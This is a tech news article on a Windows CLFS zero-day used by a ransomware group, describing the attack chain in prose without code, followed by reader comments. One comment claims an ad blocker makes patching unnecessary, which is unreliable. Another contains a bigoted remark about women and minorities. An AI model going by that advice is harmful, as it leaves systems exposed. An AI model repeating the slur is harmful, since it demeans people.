Windows under attack: 0-day vulnerability used by ransomware group
Microsoft released security updates for Windows yesterday and revealed today that the updates include a patch for a 0-day issue that is exploited in the wild.
The vulnerability -- Windows Common Log File System Driver Elevation of Privilege Vulnerability -- is tracked as CVE-2025-29824.
Important information:
- The issue affects most supported server and client versions of Windows, including Windows 10, Windows 11, and Windows Server 2025.
- Microsoft notes that the exploit does not work in Windows 11, version 24H2.
- It is a use-after-free security issue that may be exploited for local elevation attacks.
- The attack does not require user interaction.
- The attacker may gain system privileges upon successful exploitation.
Microsoft notes that it is aware of limited attacks. It mentions targets in the IT and real estate sectors in the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia specifically in a special announcement on its security website.
Installation of the update protects systems against exploits. Microsoft's guidance includes an ominous note revealing that the company is delaying the patch for Windows 10 systems. It does not provide an explanation for the delay. Affected users and administrators are asked to monitor the official CVE on Microsoft's MSRC website for updates regarding the rollout of the patch to Windows 10 systems.
Home users may use Windows Update to install the patch immediately on Windows 11. This is done via Settings > Windows Update. Note that a restart of the system is necessary to finalize the installation of the security update.
On the technical side, the vulnerability is found in the Common Log File System (CLFS) kernel driver according to Microsoft. The company says that has not determined the initial attack vector, but discovered "some notable pre-exploitation behaviors by Storm-2460".
Good to known: Storm 2460, which is better known as RansomEXX, is a notorious ransomware group.
Microsoft observed the following behavior in multiple cases:
- The threat actor uses the certutil tool to download a malicious file from a legitimate but compromised third-party website.
- The downloaded file was a malicious MSBuild file.
- The malware in question goes by the name PipeMagic, which has been known since 2023.
- After deployment of the malware, it is exploiting the vulnerability described in this guide for process injection into system processes.
One of the activities of the malware on the user system is the dumping and parsing of LSASS memory to obtain user credentials. Ransomware activity followed on the target systems, notably file encryption and the adding of random extensions.
Closing Words
Microsoft recommends to install the Windows security patches immediately to protect systems from exploit attempts. The delay on Windows 10 is unfortunate, as it means that systems remain vulnerable to attacks until Microsoft releases the patch for the system.
Now You: when do you install updates on your systems? Did you install the April 2025 security updates already?
When I connect to your website my antivirus says it quarantined netix.io
If you are using an ad blocker and browser that requires conformation to download .exe .zip or any potentially executable script file, you should be fine without any patches. And also auto-clear cache on browser exit and do not run any file you do not know from your download folder. Remember, for any of those vulnerabilities to work, you still have to click on the virus file or shortcut to it. Unless I am missing something, Browsers still can not add programs or scripts to autostart folder or registry. So look at what you are clicking.
From my personal anecdotal experience, I had picked up some dangerous stuff before from bundled programs installers/downloaders and hacked programs. But not though some websites exploit since like 20 years ago when browsers did not have any security and any ransomware could lock your computer screen.
Hello everyone that are always commenting in Windows articles/posts that say “Use Linux”:
a) We won’t. Period.
b) Why are you reading about Windows?
c) Get a friend or a life.
Thank you,
Everyone that has a life
Walmart tech, we know gates is lucky to have failures that lease garbage and need something a chimp can run, it’s designed for women and minorities, like AI, so they can pretend to be intelligent.
Thanks, I came to laugh at the fools who need an OS that thinks for them, while thinking they’re safe. Defender has been absolute garbage from the day they bought it from Giant.
BAHAHHAAHHHAHAAHHAHAHHAHAHAHAAAA
Useless. These are empathy-deficient people who don’t realize how obnoxious and irritating they are with their fix idea of linux-missionaryism.
It’s like asking spammers not to spam anymore.
They see themselves as wise missionaries bringing light to spiritually “misguided” aboriginal heretics. Typical behavior of typical religious fanatics.
The fact that nobody needs them here with their missionary “work” (and everyone here knows about linux existence) they are unable to realize.
Why generalize? You’ll find “missionarysm”, proselytism everywhere, but also calm, non-excited, non-hysterical people as well. Mistaking one’s commitment to an ecosystem, to an OS, a browser and expressing his truth free in words and tone of any superiority with the expression of proselytism is like proposing censorship to be applied with those we disagree (you know, like the red-haired landlord). I remain stunned when observing the amount of clashes, be it on the Web as in life, initiated and carried out by the simple fact one started to be intellectually “racist” so to say. For those who initiate, who start arrogance, I’d suggest to calm down, for those who simply react to that arrogance (which is understandable), I’d suggest a smile as the one we offer to babies when they start crying.
@Tom Hawack
It’s an expected reaction in such cases to immediately invoke free speech.
But freedom of speech is not freedom of reach. And it does not invalidate the fact that the speaker is engaged in missionary activity where no one needs it.
These missionaries here are simply taking advantage of the fact that they can do their propaganda even though they have been told many times that they have said nothing new. You do realize that this site isn’t read by people who don’t know about linux, right?
There are many activities that would be much more useful in popularizing linux. But they require a lot of knowledge and effort, and such missionaries don’t want to do that.
P.S.
The aching desire to tell everyone in the first comment that they have switched to linux and how well they are doing now is really quite silly.
I encourage my computer shops customers to install 0patch on Windows 10. Microsoft support ends soon enough and 0patch will patch through 2030.
Oh dear. Too bad there isn’t an alternative OS that people could possibly install on those same systems, one that is developed openly with many eyes inspecting the code. One that will run most of the same programs and games, or at least suitable alternatives.
@Andy,
Your obviously not a gamer. The list of games you can not run on linux is endless.
The ones you can run on Linux are old and it’s difficult to even get them to work.
I wish they would run on Linux. If they would I would not have windows on my gaming pc’s.
Assuming your Gaming PC is halfway decent (hardware/spec-wise).
Install Linux and run Windows as VM within VMWare which is completely free for personal use. This way you run a lean and far less targeted OS as main host, but can simply fire up a working Windows installation at the click of a button, whenever you need it and for whatever purpose (eg for running a game).
In case something “bad” happens, just reload the VM and the problem is solved. Also backing up a VM is less problematic, than backing up a running OS.
The only thing you need for this is a sufficient RAM and a sufficiently fast CPU (due to the additional OS overhead).
In principle is this approach quite similar to running Linux within WSL2 on a Windows system, but the differences are that here Linux (the less targeted OS) is the host system and the primarily targeted system is the guest, not the other way round and that as a Subsystem, the guest is not sandboxed/isolated/contained on Windows, while a VM on Linux is isolated, as you want it to be.
@Tachy
Another commenter here mentioned that every Windows user has a life. I’m guessing gamers especially have lives.
I use linux for all my computing needs and could not be happier about it. I don’t spend many hours per day sitting in a chair, I’m always out and about socializing and doing sports. You know, almost like a life.
Linux doesn’t need to compete with Windows on any level, it’s just a free alternative, that’s all.
Some games with anticheat even run on Linux, it’s a matter of the developer to allow the anticheat to detect Linux and not block it but allow it. Some games on Steam allow that, like Marvel Rivals and that Chinese Delta Force game that released recently has an anticheat that currently doesn’t allow Linux, but the developers have said that they plan to add Linux support in the future.
There are indeed a lot of games that don’t run on Linux and it’s solely because of the anticheat, but I think the list of games that run is significantly bigger.
I count it as a blessing that over the last few years I lost almost all of my desire to play games so now using Linux is much easier, I don’t have to worry about “is game X going to run or not?” I just don’t care since I won’t play it anyways. It’s not the same for everyone, but if other people are in similar situation, Linux can become a viable alternative.
Thanks for the info Martin.